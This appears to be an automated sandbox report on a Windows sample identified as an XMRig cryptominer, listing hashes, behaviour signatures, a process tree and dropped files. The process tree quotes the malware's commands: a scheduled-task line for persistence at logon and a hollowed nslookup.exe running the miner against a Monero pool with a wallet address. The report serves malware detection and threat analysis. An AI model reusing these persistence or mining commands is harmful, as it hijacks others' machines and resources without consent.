Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 13:05

General

  • Target

    ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe

  • Size

    2.1MB

  • MD5

    ef9e6a4bab77a1e5ed51669eabeba31d

  • SHA1

    43b67b32d2fd462f0cb9277ed974d63a5575fc8c

  • SHA256

    ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b

  • SHA512

    8d3605e486f0ccb01d3022d54c57e8c65622272f5b477035469e45d3289973407f0584142b261a3faca797e03412d182c376c2a2ba6970181e059982223afe99

  • SSDEEP

    24576:XRVlL9DqdKIEs0D7Vx1YPgZqkwBKmXXJj52antf0RsLrGaaFssusSWcaurrYL0Yv:h/GJ66PgUKUZkgtzGGsrzcdorJKJS

Score
10/10

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 11 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe
    "C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4196
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3552
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3068
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:3232
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\IOAshdohSha.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2300
        • C:\Users\Admin\IOAshdohSha.exe
          C:\Users\Admin\IOAshdohSha.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3604
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\IOAshdohSha.exe"
            5⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4808
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4384
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "/sihost64"
                7⤵
                  PID:4272
              • C:\Windows\System32\nslookup.exe
                C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3156

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

      Filesize

      539B

      MD5

      b245679121623b152bea5562c173ba11

      SHA1

      47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

      SHA256

      73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

      SHA512

      75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

      Filesize

      31KB

      MD5

      6a7e9885a2d01df564b46f8f27258853

      SHA1

      2f57231a188226669ff74cf886a09572ed69025e

      SHA256

      6ba3e42c8fa7dabe994e2793f369bac914ea2e4949174fc2a0efe4cbfebe8171

      SHA512

      84b4b84066a48df6bd087679a75333c306c8f688679c508e171b14d5012711de3a781cea4d4c65debb694557dafd66dbc359516451f700179d5c6806710cdf17

    • C:\Users\Admin\IOAshdohSha.exe

      Filesize

      2.1MB

      MD5

      ef9e6a4bab77a1e5ed51669eabeba31d

      SHA1

      43b67b32d2fd462f0cb9277ed974d63a5575fc8c

      SHA256

      ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b

      SHA512

      8d3605e486f0ccb01d3022d54c57e8c65622272f5b477035469e45d3289973407f0584142b261a3faca797e03412d182c376c2a2ba6970181e059982223afe99

    • memory/3156-34-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3156-30-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3156-40-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3156-41-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3156-39-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3156-35-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3156-31-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3156-32-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3156-33-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3156-29-0x000001D34DD70000-0x000001D34DD90000-memory.dmp

      Filesize

      128KB

    • memory/3156-26-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3156-28-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/3552-1-0x00007FFB25093000-0x00007FFB25095000-memory.dmp

      Filesize

      8KB

    • memory/3552-2-0x00000209F77B0000-0x00000209F79D0000-memory.dmp

      Filesize

      2.1MB

    • memory/3552-3-0x00000209DEC00000-0x00000209DEC12000-memory.dmp

      Filesize

      72KB

    • memory/3552-0-0x00000209DCC90000-0x00000209DCEB0000-memory.dmp

      Filesize

      2.1MB

    • memory/3552-4-0x00007FFB25090000-0x00007FFB25B51000-memory.dmp

      Filesize

      10.8MB

    • memory/3552-11-0x00007FFB25090000-0x00007FFB25B51000-memory.dmp

      Filesize

      10.8MB

    • memory/3552-7-0x00007FFB25090000-0x00007FFB25B51000-memory.dmp

      Filesize

      10.8MB

    • memory/3552-6-0x00007FFB25093000-0x00007FFB25095000-memory.dmp

      Filesize

      8KB

    • memory/3552-5-0x00007FFB25090000-0x00007FFB25B51000-memory.dmp

      Filesize

      10.8MB

    • memory/4272-37-0x0000019397CD0000-0x0000019397CD6000-memory.dmp

      Filesize

      24KB

    • memory/4272-38-0x0000019399910000-0x0000019399916000-memory.dmp

      Filesize

      24KB